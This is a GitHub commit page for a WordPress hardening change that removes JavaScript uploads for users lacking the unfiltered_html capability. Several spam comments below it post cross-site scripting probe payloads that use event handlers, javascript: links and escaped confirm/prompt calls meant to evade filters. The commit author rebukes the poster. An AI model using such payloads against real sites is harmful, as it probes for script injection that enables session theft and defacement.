Skip to content
Permalink
Browse files
Hardening: Remove the ability to upload JavaScript files for users wh…
…o do not have the `unfiltered_html` capability.

Built from https://develop.svn.wordpress.org/trunk@42261


git-svn-id: http://core.svn.wordpress.org/trunk@42090 1a063a9b-81f0-0310-95a4-ce76da25c4cd
  • Loading branch information
johnbillion committed Nov 29, 2017
1 parent f1de7e4 commit 67d03a98c2cae5f41843c897f206adde299b0509
Showing with 4 additions and 3 deletions.
  1. +3 −2 wp-includes/functions.php
  2. +1 −1 wp-includes/version.php
@@ -2565,8 +2565,9 @@ function get_allowed_mime_types( $user = null ) {
if ( function_exists( 'current_user_can' ) )
$unfiltered = $user ? user_can( $user, 'unfiltered_html' ) : current_user_can( 'unfiltered_html' );

if ( empty( $unfiltered ) )
unset( $t['htm|html'] );
if ( empty( $unfiltered ) ) {
unset( $t['htm|html'], $t['js'] );
}

/**
* Filters list of allowed mime types and file extensions.
@@ -4,7 +4,7 @@
*
* @global string $wp_version
*/
$wp_version = '5.0-alpha-42260';
$wp_version = '5.0-alpha-42261';

/**
* Holds the WordPress DB revision, increments when changes are made to the WordPress DB schema.

10 comments on commit 67d03a9

@Yusufali0377

This comment was marked as spam.

Copy link

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

">

Clickme

@Yusufali0377

This comment was marked as spam.

Copy link

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

"><textarea autofocus onfocus=co\u006efir\u006d(1)>

@Yusufali0377

This comment was marked as spam.

Copy link

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

"><h1/ondrag=co\u006efir\u006d1)>DragMe

@Yusufali0377

This comment was marked as spam.

Copy link

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

"><ScRiPt>co\u006efir\u006d1</ScRiPt>

@Yusufali0377

This comment was marked as spam.

Copy link

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

">

Clickme

@Yusufali0377

This comment was marked as spam.

Copy link

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

">

Clickme

@Yusufali0377

This comment was marked as spam.

Copy link

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

"><a href=javascript:prompt%28 1%29>Clickme

@Yusufali0377

This comment was marked as spam.

Copy link

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

"><img/src=x%0Aonerror=prompt1>

@johnbillion

This comment has been minimized.

Copy link
Member Author

@johnbillion johnbillion replied Jan 21, 2018

@Yusufali0377 This is not the place to test security vulnerabilities. Use your own repo.

@DP44

This comment was marked as off-topic.

Copy link

@DP44 DP44 replied Jul 8, 2018

@Yusufali0377 wtf are you doing? those xss payloads are useless, github isnt vulnerable to them moron.

Please sign in to comment.